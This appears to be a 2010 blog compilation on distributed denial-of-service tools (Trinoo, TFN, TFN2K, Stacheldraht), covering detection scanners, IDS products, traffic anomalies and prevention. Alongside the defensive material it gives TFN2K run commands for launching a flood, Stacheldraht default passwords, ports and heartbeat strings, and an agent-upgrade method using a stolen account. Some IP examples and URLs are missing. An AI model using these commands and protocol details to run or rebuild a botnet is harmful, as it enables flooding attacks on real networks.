    Use Scanning Tools : Denial of Service attacks

    There are several tools available which could detect whether a system is being used as a DDOS server. The following tools can detect TFN2K, Trinoo and Stacheldraht.

    1. Find_ddos

    2. SARA

    3. DDoSPing v2.0

    4. RID

    5. Zombie Zapper
    The tool find_ddos is intended to scan a local system that is either known or suspected to contain a DDOS program. It is capable of scanning executing processes on Solaris 2.6 or later, and of scanning local files on a Solaris 2.x (or later) system.
    The tool will detect several known denial-of-service attack tools by looking at all 32-bit ELF format files in a given directory tree, and comparing the files' strings and symbol table against a set of known "fingerprints" for TFN and trinoo tools. If a file is considered a close enough match to one of these fingerprints, it is identified with that file. The tool will optionally make a copy of all files that are found to match. If it finds a match in a running process, it will also grab a core image of the process for subsequent analysis. Any matches that are found are also examined for any embedded IP addresses. All results are either displayed to the user's terminal, or stored in a log file.
    The tool also looks for files named ".sr", "...", "mservers", and optionally makes a copy of them for later analysis. (These are common names for files that contain a list of blowfish-encrypted IP addresses. The blowfish encryption key can be found by examining the binary.)
    The distributed denial-of-service tools that are detected by the tool are:

    • mstream master

    • mstream server

    • stacheldraht client

    • stacheldraht daemon

    • stacheldraht master

    • tfn-rush client

    • tfn client

    • tfn daemon

    • tfn2k client

    • tfn2k daemon

    • trinoo daemon

    • trinoo master
    The tool must be run as root. The syntax of the tool is:
    ./find_ddos [-g grabdir] [-1 logfile] [-p] [-v] [-V] [-x exclude1] [scandir] 
    SARA (Security Auditor's Research Assistant), a derivitive of the Security Administrator Tool for Analyzing Networks (SATAN), remotely probes systems via the network and stores its findings in a database. The results can be viewed with any Level 2 HTML browser that supports the http protocol (e.g. Mosaic, Netscape etc.)
    primary_targets(s) can specify a:
    host (e.g.,,
    range (e.g.,–
    subnet (e.g.,
    When no primary_target(s) are specified on the command line, SARA starts up in interactive mode and takes commands from the HTML user interface. When primary_target(s) are specified on the command line, SARA collects data from the named hosts, and, possibly, from hosts that it discovers while probing a primary host. A primary target can be a host name, a host address, or a network number. In the latter case, SARA collects data from each host in the named network. SARA can generate reports of hosts by type, service, vulnerability and by trust relationship.
    This is a tool that explores another system and looks for vulnerabilities. DDoSPing is a remote network scanner for the most common DDoS programs. It can detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings, although configuration of each program type is possible from the tool's configuration screen. Scanning is performed by sending the appropriate UDP and ICMP messages at a controllable rate to a user-defined range of addresses.
    RID (remote intrusion detector) is a tool programmed in C that is a highly configurable packet snooper and generator. It works by sending out packets defined in the config.txt file, then listening for appropriate replies.
    RID can detect any remote software that elicits a predefined response to a given set of packets. Examples are:

    • The Trinoo distributed denial of service attack client.

    • The Tribal flood network distributed denial of service attack client.

    • The StachelDraht distributed denial of service attack client.
    This list is not extensive -- the tool is highly configurable to suit specific needs. RID is not a vulnerability assessment tool. It is also -- not a network intrusion detection system in the sense that it does not continually run monitoring your network.
    Example: # Sample config file  start AgentStacheldraht   send icmp type=0 id=668 data=""
          recv icmp type=0 id=669 data="sicken" nmatch=2 end AgentStacheldraht 
    Zombie Zapper
    Zombie Zapper works against Trinoo, TFN, Stacheldraht,  Troj_Trinoo (Windows port of Trinoo), and Shaft. Assuming that

    Common IDS systems

    1. Shareware

    2. Snort

    3. Shadow

    4. Courtney

    5. Commercial

    6. ISS RealSecure

    7. Axent NetProwler

    8. Cisco Secure ID (Net Ranger)

    9. Network Flight Recorder

    10. Network Security Wizard's Dragon
    An Intrusion Detection System (abbreviated as IDS) is a defense system, which detects hostile activities in a network. The key is then to detect and possibly prevent activities that may compromise system security, or a hacking attempt in progress including reconnaissance/data collection phases that involve for example, port scans.
    One key feature of intrusion detection systems is their ability to provide a view of unusual activity and issue alerts notifying administrators and/or block a suspected connection. In addition, IDS tools are capable of distinguishing between insider attacks originating from inside the organization (coming from own employees or customers) and external ones (attacks and the thread posed by hackers).
    Once an intrusion has been detected, IDS issues alerts notifying administrators of this fact. The next step is undertaken either by the administrators or the IDS itself, by taking advantage of additional countermeasures (specific block functions to terminate sessions, backup systems, routing connections to a system trap, legal infrastructure etc.) - following the organization's security policy.
    There are two kinds of DDOS-generated traffic, control traffic (between DDOS client and servers) and flood traffic (between DDOS servers and DDOS victim).
    Anomaly 0: This is not real "DDOS" traffic, but it can be a viable method of determining the origin of DDOS attacks. As observed by RFP, an attacker will have to resolve his victim's hostname before a DDOS attack. BIND name servers are capable of recording these requests. You can either send them a WINCH signal with 'kill' or you can specify query logging in the BIND configuration. A single PTR type query before an attack indicates the request was made from the attacker's host, a great load of PTR type query for a DDOS victim before an attack indicates that the flood servers have been fed a host name and each server was resolving the hostname for itself.
    Anomaly 1: Amount of bandwidth exceeds a maximum threshold that is expected normal traffic for a site could cause. Alternatively, the threshold can be measures for addresses in the traffic. These are clear signs of flood traffic and ACL rules can be implemented on the backbone routers that detect these signs and filter traffic.
    Anomaly 2: Oversized ICMP and UDP packets. Stateful UDP sessions are normally using small UDP packets, having a payload of not more than 10 bytes. Normal ICMP messages don't exceed 64 to 128 bytes. Packets that are reasonably bigger are suspicious of containing control traffic, mostly the encrypted target(s) and other options for the DDOS server. Once (non-decoy) control traffic is spotted, one of the DDOS servers' location is revealed, as the destination IP address is not spoofed in control traffic.
    Anomaly 3: TCP packets (and UDP packets) that are not part of a connection. The stealthiest DDOS tools use random protocols, including connection-oriented protocols, to send data over non-connection-oriented channels. Using stateful firewalls or link-state routing can discover these packets. Additionally, packets that indicate connection requests with destination ports above 1024, with which no known service is registered and running, are highly suspicious.
    Anomaly 4: Packet payload contains ONLY alphanumeric character (e.g. no spaces, punctuation, control characters). This can be a sign that the packet payload is BASE64-encoded, and therefore contains only base64 characters. TFN2K is sending such packets in its control traffic. A TFN2K (and TFN2K derivatives) specific pattern is a string of repeating A's (AAAA...) in the payload, since the buffer size is padded by the encryption routine. If the BASE64 encoding is not used, and the payload contains binary encrypted traffic, the A's will be trailing binary \0's.
    Anomaly 5: Packet payload contains ONLY binary, high-bit characters. While this can be a binary file transfer (traffic transmitted over ports 20, 21, 80, etc. must be excluded if this rule is applied), especially if contained in packets that are not part of valid stateful traffic, it is suspicious of being non-base64 encoded, but encrypted control traffic that is being transmitted in the packet payload.
    Some of the popular IDS are:

    1. Shareware

    2. Snort

    3. Shadow

    4. Courtney

    5. Commercial

    6. ISS RealSecure

    7. Axent NetProwler

    8. Cisco Secure ID (Net Ranger)

    9. Network Flight Recorder

    10. Network Security Wizard's Dragon
      ........................................................................................................................... ..................................................
      ........................................................................................................................... .................................................. 

    Preventing the DDoS

  • Keep the network secure

  • Install IDS (Intrusion Detection System)

  • Use scanning tools

  • Run zombie tools
    IDS pattern matching technologies have a database of signatures. When it finds packets that have a given pattern, it sets off an alarm.

  • Important things to do as a current or potential victim of packet flooding Denial of Service are given below:
    The bandwidth used in DDoS attacks is important. Therefore, there should be proper coordination with the ISP and the ISP with the upstream providers. To prevent SYN flooding attacks, set up the TCP interception feature. Details about this can be found at Block the UDP and ICMP messages that are not required by the network. Especially permitting outgoing ICMP unreachable messages could multiply the impact of a packet flooding attack. Deny all traffic that is not explicitly needed for the servers run. Adopt multi-homing as a best practice.
    If attacked, start countermeasures as soon as possible. The response should be to determine origins of spoofed DoS attacks. This should be done quickly as the router entries that allow traffic backtracking will expire a short time after the flood is halted. Be updated. Check exploits databases, for example at, or packetstorm.Com, to make sure that the versions of server software are not proven vulnerable. Learn sufficiently enough about how the system and server software operates, and review configuration and the security measures that are applied frequently. Set up a system that generates cryptographic signatures of all binary and other trusted system files, and compare the changes to those files periodically. Additionally, using a system where you store the actual checksums on a different machine or removable media, to which a remote attacker cannot have access, is strongly recommended. If you detect an attack emerging from your networks or hosts, or if you are being contacted because of this, you must immediately shut down your systems, or at least disconnect any of the systems from any network. If such attacks are being run on your hosts, it means that the attacker has almost-full control of the machines. They should be analyzed, and then reinstalled.

    Wednesday, March 24, 2010

    Preventing DoS Attacks

    You could do the following things to minimize the DoS attack:

    1. Effective robust design

    2. Bandwidth limitations

    3. Keep systems patched

    4. Run the least amount of services

    5. Allow only necessary traffic

    6. Block IP addresses
    Due to the power of DoS attacks and the way they work, there is nothing that can be done to prevent a Dos attack entirely
    The DoS and DDoS attacks in combination with malicious codes implantations are easily launched but difficult to completely stop. With the nature of TCP/IP and programming issues that are often overlooked, the current Internet is still vulnerable to various forms of DoS and DDoS attacks. There is no "silver bullet" solution to this, like many other security issues.

    • Timely application of patches and system updates, especially to potentially exposed machines. For example, update and maintain a current build of BIND on DNS servers.

    • Deployment of only strictly necessary network services

    • Intrusion detection systems

    • Firewalls

    • Anti-virus software

    • Good password policies

    • Use of Tripwire or other similar tools to detect changes in configuration information or other important files

    • Paying heed to "Top 20" vulnerability lists provided by the information security community and evaluating these risks against one's environment

    • Establishment and maintenance of regular backup schedules and policies

    • As a network is only as secure as its weakest link, protection of mobile and remote machines with personal firewall/intrusion detection software
    However, in mitigating DoS or DDoS attacks, it requires good network design to be able to control the point of entry or the gateway. As for mitigating new attacks, it is essential to have filtering capability based on packet header and content within the network or at the critical gateways in order to filter malicious traffic as a response to such attacks while waiting for a permanent solution from suppliers to be applied to the devices. Applying all known patches and fixes to all devices in the network to prevent known attacks is necessary. Finally, it is important to have the relevant referrals in the policy and legislations to address the issue of DoS and DDoS to ensure an effective cooperation between service providers and law enforcement agencies .

    Saturday, March 20, 2010

    Tribe Flood Network : Tools Trinoo, TFN2K & Stacheldraht


    • Could be thought of as 'son of trinoo'

    • Improved on some of the weaknesses of trinoo by adding different types of attacks that could be mounted against the victim site.

    • Structured like trinoo with attackers, clients (masters) and daemons.

    • Initial system compromise allows the TFN programs to be installed.
    Tribe Flood Network, like trinoo, uses a master program to communicate with attack agents located across multiple networks. TFN launches coordinated Denial of Service Attacks that are especially difficult to counter as it can generate multiple types of attacks and it can generate packets with spoofed source IP addresses. Some of the attacks that can be launched by TFN include UDP flood, TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast. The basic characteristics of and suggested defense strategies against the TFN DDoS attack follow.

    • To initiate TFN, the attacker accesses the master program and sends it the IP address of one or more targets. The master program proceeds to communicate with all of the agent programs, instructing them to initiate the attack.

      • Communications between TFN master programs and agent programs use ICMP echo reply packets, where the actual instruction to be carried out is embedded in the 16-bit ID field in binary format. The use of ICMP (Internet Control Message Protocol) makes packet protocol filtering possible.

        • TFN agents can be defeated by configuring your router or intrusion detection system to disallow all ICMP echo and echo reply packets onto your network. However, this will break all internet programs (such as "ping") that utilize these functions.

      • The TFN master program reads a list of IP addresses containing the locations of the agents programs. This list of addresses may be encrypted, using "Blowfish" encryption.

        • If it is not encrypted, then the agents can be identified from the list.

      • The TFN agent programs have been found on systems with the filename td and the master programs with the name tfn. They can be positively identified by running the UNIX strings command.

        • TFN agents do not check where the ICMP echo reply packets come from. Therefore, it is possible to forge ICMP packets to flush out these processes.
    TFN is made up of client and daemon programs, which implement a distributed network denial of service tool capable of waging ICMP flood, SYN flood, UDP flood, and Smurf style attacks, as well as providing an "on demand" root shell bound to a TCP port. The TFN network is made up of a tribe client program ("tribe.c") and the tribe daemon ("td.c"). The attacker(s) control one or more clients, each of which can control many daemons. The daemons are all instructed to coordinate a packet based attack against one or more victim systems by the client. Remote control of a TFN network is accomplished via command line execution of the client program, which can be accomplished using any of a number of connection methods (e.g., remote shell bound to a TCP port, UDP based client/server remote shells, ICMP based client/server shells such as LOKI, SSH terminal sessions, or normal "telnet" TCP terminal sessions.)
    No password is required to run the client, although it is necessary to have the list of daemons at hand in an "iplist" file. Communication from the TFN client to daemons is accomplished via ICMP_ECHOREPLY packets. There is no TCP or UDP based communication between the client and daemons at all.
    While the client is not password protected, per se, each "command" to the daemons is sent in the form of a 16 bit binary number in the id field of an ICMP_ECHOREPLY packet. (The sequence number is a constant 0x0000, which would make it look like the response to the initial packet sent out by the "ping" command.)
    The values of these numbers, as well as macros that change the name of the running process as seen by PS (1) are defined by the file "config.h". As with trinoo, the method used to install the client/daemon will be the same as installing any program on a UNIX system, with all the standard options for concealing the programs and files.
    Both the client and the daemon must be run as root, as they both open an AF_INET socket in SOCK_RAW mode. The client program requires the iplist be available. Recent installations of TFN daemons have included strings that indicate the author is (or has) added Blowfish encryption of the iplist file. This will make the task of determining the daemons much harder.
    Detecting trinoo/TFN related attacks: Several conventional attacks are known to be related to trinoo/TFN compromises. Machines that are compromised using the following list of attacks should be checked for trinoo/TFN daemons:
    - - rpc.ttdbserver
    - - amd
    - - rpc.cmsd
    - - rpc.mountd
    - - rpc.statd
    Hacking Tool: TFN2K

    • TFN2K is a DDOS program which runs in distributed mode. There are two parts to the program: client and server.

    • The server (also known as zombies) runs on a machine in listening mode and waits for commands from the client.
      Running the server #td Running the client #tn -h -c8 -i 
    This command starts an attack from to the victim's computer
    The TFN2K distributed denial of service system consists of client/server architecture.
    The Client: The client is used to connect to master servers, which can then perform specified attacks against one or more victim machines. Commands are sent from the client to the master server within the data fields of ICMP, UDP, and TCP packets. The data fields are encrypted using the CAST algorithm and base64 encoded.
    The client can specify the use of random TCP/UDP port numbers and source IP addresses. The system can also send out "decoy" packets to non-target machines. These factors make TFN2K more difficult to detect than the original TFN program.
    The Master Server: The master server parses all UDP, TCP, and ICMP echo reply packets for encrypted commands. The master server does not use a default password when it is selected by the user at compile time.

    Attack Methods
    The Attack: The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth.
    TFN2K can also be used to execute remote commands on the master server and bind shells to a specified TCP port. TFN2K runs on Linux, Solaris, and Windows platforms.

    Hacking Tool: Stacheldraht

  • Stacheldraht combines the features of TFN and Trinoo but adds encryption layer between daemons.

  • Stacheldraht uses TCP and ICMP on the following ports:

    • Client to Handler: 16660 TCP

    • Handler to and from agents: 65000 ICMP

  • Stacheldraht consists of three parts: the master server, client, and agent programs.
    The Client:
    The client is used to connect to the master server on port 16660 or port 60001. Packet contents are blowfish encrypted using the default password "sicken", which can be changed by editing the Stacheldraht source code. After entering the password, an attacker can use the client to manage Stacheldraht agents, IP addresses of attack victims, lists of master servers, and to perform DoS attacks against specified machines.
    The Master Server: The master server handles all communication between client and agent programs. It listens for connections from the client on port 16660 or 60001. When a client connects to the master, the master waits for the password before returning information about agent programs to the client and processing commands from the client.
    The Agent: The agent listens for commands from master servers on port 65000. In addition to this port, master server/agent communications are also managed using ICMP echo reply packets. These packets are transmitted and replied to periodically. They contain specific values in the ID field (such as 666, 667, 668, and 669) and corresponding plaintext strings in the data fields (including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a "heartbeat" between agent and master server, and to determine source IP spoofing capabilities of the master server. The agent identifies master servers using an internal address list, and an external encrypted file containing master server IP addresses. Agents can be directed to "upgrade" themselves by downloading a fresh copy of the agent program and deleting the old image as well as accepting commands to execute flood attacks against target machines.
    The Attack: Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood attacks. The attacks can run for a specified duration, and SYN floods can be directed to a set of specified ports. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth.
    Stacheldraht (German for "barbed wire") combines features of the "trinoo" distributed denial of service tool, with those of the original TFN, and adds encryption of communication between the attacker and stacheldraht masters and automated update of the agents.
    One of the weaknesses of TFN was that the attacker's connection to the master(s) that control the network was in clear-text form, and was subject to standard TCP attacks (session hijacking, RST sniping, etc.) Stacheldraht deals with this by adding an encrypting "telnet alike" (stacheldraht term) client. The attacker(s) control one or more handlers using encrypting clients. Each handler can control many agents (up to 1000 agents). The agents are all instructed to coordinate a packet-based attack against one or more victim systems by the handler.
    Unlike trinoo, which uses UDP for communication between handlers and agents, or the original Tribe Flood Network, which uses ICMP for communication between the handler and agents, stacheldraht uses TCP and ICMP. Client to handler(s): 16660/tcp and Handler to/from agent(s): 65000/tcp, ICMP_ECHOREPLY. Remote control of a stacheldraht network is accomplished using a simple client that uses symmetric key encryption for communication between itself and the handler.
    After connecting to the handler using the client program, the attacker is prompted for a password. This password (default "sicken") is a standard crypt() encrypted password, which is then Blowfish encrypted using the passphrase "authentication" before being sent over the network to the handler. One feature of stacheldraht not shared by trinoo or TFN is the ability to upgrade the agents on demand. This feature employs the Berkeley "rcp" command (514/tcp), using a stolen account at some site as a cache. On demand, all agents are instructed to delete the current program image, go out and get a new copy (either Linux- or Solaris-specific binary) from a site/account using "rcp", start running this new image with "nohup", and then exit.
    When each agent starts up, it attempts to read a master server configuration file to learn which handler(s) may control it. This file is a list of IP addresses, encrypted using Blowfish, with a passphrase of "randomsucks". Failing to find a configuration file, there are one or more default handler IP addresses compiled into the program. Once the agent has determined a list of potential handlers, it then starts at the beginning of the list of handlers and sends an ICMP_ECHOREPLY packet with an ID field containing the value 666 and data field containing the string "skillz". If the master gets this packet, it sends back an ICMP_ECHOREPLY packet with an ID field containing the value 667 and data field containing the string "ficken".
    In addition to finding an active handler, the agent performs a test to see if the network on which the agent is running allows packets to exit with forged source addresses. It does this by sending out an ICMP ECHO packet with a forged IP address of "", an ID of 666, and the IP address of the agent system (obtained by getting the hostname, then resolving this to an IP address) in the data field of the ICMP packet.
    If the master receives this packet, it replies to the IP address embedded in the packet with an ICMP_ECHOREPLY packet containing an ID of 1000 and the word "spoofworks" in the data field. If the agent receives this packet, it sets a spoof_level of zero (can spoof all 32 bits of IP address). If it times out before receiving a spoof reply packet, it sets a spoof_level of 3 (can only spoof the final octet).